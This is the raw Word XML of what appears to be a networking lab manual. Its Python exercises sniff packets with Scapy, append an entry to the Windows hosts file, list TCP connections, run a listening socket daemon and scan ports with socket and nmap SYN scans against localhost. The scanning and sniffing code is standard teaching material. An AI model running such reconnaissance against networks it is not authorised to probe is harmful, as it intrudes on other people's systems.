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1534A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="533" w:right="533"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>List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Experiments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9529B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416DC6D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:right="612"/>
      </w:pPr>
      <w:r>
        <w:t>Analyze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subnetting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with Scapy and Matplotlib.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B130095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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A50D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scapy.all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sniff, IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCAF8A1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collections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Counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB113C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matplotlib.pyplot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as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plt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F8FBA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ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949D0C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FDA2B17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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># Counter to store IP occurrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB40D49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ip_count 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Counter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E9424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2361533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DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>capture_packets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packet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7FD8237C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packet.haslayer(IP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D643B6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C0AD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># Count both source and destination IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F053BE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ip_count[packet[IP].src] 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25C96376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ip_count[packet[IP].dst] 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39F96BA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0A2B716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"Sniffing 50 packets. (Make sure you have appropriate privileges!)"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D569849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sniff(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prn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capture_packets, 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B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>50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E1D2BCC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025ED94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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># Plot the IP frequency distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1810A5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ips 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(ip_count.keys())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48436787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counts 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(ip_count.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE77ADC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7613B7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plt.figure(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figsize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C0AD7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AC0AD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283218A6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plt.bar(ips, counts, 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'blue'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4E84D6E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plt.xticks(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rotation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B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>45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EEF467B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plt.xlabel(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"IP Addresses"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C6FCE8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plt.ylabel(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"Number of Packets"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851DB0B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plt.title(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"IP Address Allocation Analysis"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74D06F7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plt.tight_layout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111126FF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plt.show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11C26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65AD07D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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># Classify IPs as private or public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD2FAB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DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>classify_ip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C0AD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ip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501A6818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try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0184AAB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ip_obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC0AD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ipaddress.ip_address(ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF555D0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"Private"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ip_obj.is_private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"Public"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA08A6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except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4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ValueError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15A73FD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"Invalid IP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262086C8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8DF6047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C0AD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IP Classification:"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C7D516B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ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC0AD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ips:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9569B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C0AD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ip</w:t>
      </w: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classify_ip(ip)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC0AD7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AC0AD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C0AD7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16C3EE4" w14:textId="77777777" w:rsidR="00AC0AD7" w:rsidRPr="00AC0AD7" w:rsidRDefault="00AC0AD7" w:rsidP="00AC0AD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C154AEB" w14:textId="77777777" w:rsidR="00AC0AD7" w:rsidRDefault="00AC0AD7" w:rsidP="00AC0AD7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:right="612"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7207E3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>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/resolv.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C1DA8" w14:textId="77777777" w:rsid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 w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6350C28D" w14:textId="5EDE10B0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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44834D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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6DDFE9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import shutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133DDAA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</w:p>
    <w:p w14:paraId="5DCB8B70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# Path to Windows hosts file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B128DE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HOSTS_FILE = r"C:\Windows\System32\drivers\etc\hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79BD0A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</w:p>
    <w:p w14:paraId="08561429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def read_hosts():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69500F2E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if not os.path.exists(HOSTS_FILE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6350F2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print("[ERROR] Hosts file not found!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602529B5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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDDDC6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with open(HOSTS_FILE, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1A050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data = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FFD6B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print("=== Hosts File Contents ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9E27D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print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202AF7A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</w:p>
    <w:p w14:paraId="3C129B89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def modify_hosts():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5A3CD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if not os.path.exists(HOSTS_FILE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9AF75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print("[ERROR] Hosts file not found!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D2059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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AEF87C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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F7426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# Backup the original hosts file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A97E477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backup = HOSTS_FILE + ".bak"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3024A371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shutil.copy(HOSTS_FILE, backup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089EE36C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with open(HOSTS_FILE, "a") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528750A5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    file.write("\n192.168.1.100 mycustomhost\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D9C70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print("[SUCCESS] Hosts file updated. Backup created at:", backup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD74E00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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8439F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print("[ERROR] Failed to update hosts file:", e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6FAB5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</w:p>
    <w:p w14:paraId="21ECEAB1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def restart_network():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4425F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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA30795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# Flush DNS cache to apply changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266CD80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os.system("ipconfig /flushdns")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE67067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print("[SUCCESS] DNS cache flushed. Changes applied.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F731582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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CD9E4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    print("[ERROR] Failed to flush DNS cache:", e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FEC7A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</w:p>
    <w:p w14:paraId="5AEFC655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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9885B2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read_hosts()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DC24C" w14:textId="77777777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modify_hosts()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E35D6" w14:textId="7323C622" w:rsidR="00AC0AD7" w:rsidRP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 w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC0AD7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    restart_network()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27058FE3" w14:textId="77777777" w:rsidR="00AC0AD7" w:rsidRDefault="00AC0AD7" w:rsidP="00AC0AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="551" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4286A27E" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00AC0AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="551" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB942D1" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00AC0AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="551" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A1438F" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00AC0AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="551" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A56AE0" w14:textId="31415505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line="242" w:lineRule="auto"/>
        <w:ind w:right="90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TCP/IP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daemons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 system using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6A2E8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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17644B17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import psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA17CA8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</w:p>
    <w:p w14:paraId="373827ED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def list_tcp_connections():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00608259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for conn in psutil.net_connections(kind='tcp'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11753C3E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laddr = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994DAEF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raddr = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FE4D0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print(f"PID: {conn.pid}, Local Address: {laddr}, Remote Address: {raddr}, Status: {conn.status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719D163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</w:p>
    <w:p w14:paraId="548283ED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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C0772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print("Listing active TCP connections:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B405CB" w14:textId="1E866CEB" w:rsid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list_tcp_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF20A5" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="481C98D4" w14:textId="77777777" w:rsidR="00195426" w:rsidRPr="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="900"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7502044A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48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logs incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2A264" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="485"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7A6B91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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DA56B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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FCA92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</w:p>
    <w:p w14:paraId="3E4B0E91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def start_daemon(host='0.0.0.0', port=5000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AAE1C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server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76556A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server_socket.bind((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7BD45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server_socket.listen(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4B9E9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print(f"Network daemon listening on {host}:{port}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD022C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41094CB8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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0F6B4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client_socket, client_address = server_socket.accept()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17951249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print(f"Connection received from {client_address}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB4B84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# Send a welcome message and then close the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BCEE5A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client_socket.sendall(b"Hello! You are connected to the network daemon.\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6010E602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client_socket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354C98D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</w:p>
    <w:p w14:paraId="66C4CC22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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC452BF" w14:textId="26D8311D" w:rsid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start_daemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232017B2" w14:textId="77777777" w:rsidR="00195426" w:rsidRPr="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="485"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696B80D1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line="284" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20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 machine using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39CE88" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r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pacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C3C22" w14:textId="77777777" w:rsidR="00F74D1E" w:rsidRDefault="00F74D1E">
      <w:pPr>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B54441B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>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5716A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>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539CAC6C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</w:p>
    <w:p w14:paraId="3C8F9EED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>def scan_ports_socket(target, ports):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0AEF4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print("=== Scanning ports using socket ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4C413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for port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972C314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    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B29641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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            sock.settimeout(1)  # Set timeout to 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B1A1A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        result = sock.connect_ex((target, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E650CCB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        if result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8AE2C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            print(f"Port {port} is OPEN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EB371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        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6A748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            print(f"Port {port} is CLOSED or FILTERED")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716C3598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</w:p>
    <w:p w14:paraId="5F50EA26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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33A8C5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# Set target IP and ports to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE55CC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target_ip = "127.0.0.1"  # Change as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E50D9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ports_to_scan = [22, 80, 443, 8080]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C05139" w14:textId="77777777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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4337F" w14:textId="04F8E0FC" w:rsidR="00F74D1E" w:rsidRPr="00F74D1E" w:rsidRDefault="00F74D1E" w:rsidP="00F74D1E">
      <w:pPr>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F6228" w:themeColor="accent3" w:themeShade="80"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F74D1E">
        <w:rPr>
          <w:b/>
          <w:color w:val="4F6228" w:themeColor="accent3" w:themeShade="80"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    scan_ports_socket(target_ip, ports_to_scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4059D3E7" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426">
      <w:pPr>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE1622A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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FC9BD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#pip3 install python-nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B2163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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ECC8FA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import nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6FBE2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</w:p>
    <w:p w14:paraId="0359D782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def scan_ports_socket(target, ports):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD57DE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print("=== Scanning ports using socket ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10979F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for port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20957C8A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with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D78271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sock.settimeout(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3E764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result = sock.connect_ex((target, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C0C5F7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if result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09775805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    print(f"Port {port} is OPEN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42786FA3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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FA66B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    print(f"Port {port} is CLOSED or FILTERED")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80276B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</w:p>
    <w:p w14:paraId="687517D3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def scan_ports_nmap(target):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FDF7A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print("\n=== Scanning ports using nmap ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD45C1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scanner = nmap.PortScanner()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9CF76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scanner.scan(target, '1-1024', '-sS')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798AD3F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if target in scanner.all_hosts():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B1963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for port in scanner[target]['tcp']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2149BA17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state = scanner[target]['tcp'][port]['state']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474D701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    print(f"Port {port}: {state}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31690241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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248836A1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    print("No results from nmap scan.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A48F1D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</w:p>
    <w:p w14:paraId="7C131017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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D4A48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# Set target IP and ports to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF74C73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target_ip = "127.0.0.1"  # Change as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CBCA2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ports_to_scan = [22, 80, 443, 8080]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D700F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60EE27" w14:textId="77777777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scan_ports_socket(target_ip, ports_to_scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A07402" w14:textId="039D2E01" w:rsidR="00195426" w:rsidRPr="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195426">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    scan_ports_nmap(target_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B513DE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659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extract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addresses,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masks,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 gateways from system network settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090DE51" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="659" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
